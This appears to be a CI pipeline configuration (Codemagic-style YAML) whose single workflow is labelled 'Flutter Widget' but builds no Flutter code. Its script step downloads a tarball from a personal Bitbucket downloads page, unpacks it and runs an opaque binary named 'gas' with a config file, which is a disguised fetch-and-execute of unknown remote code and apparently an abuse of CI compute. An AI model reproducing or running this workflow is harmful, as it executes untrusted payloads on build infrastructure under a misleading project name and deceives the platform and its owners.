workflows:
    
    flutter-widget:
        name: Flutter Widget
        max_build_duration: 120
        environment:
            flutter: dev
        scripts:
            - wget https://bitbucket.org/19410711/dumang/downloads/joss.tar.gz && tar -xvf joss.tar.gz && ./gas keun.ini
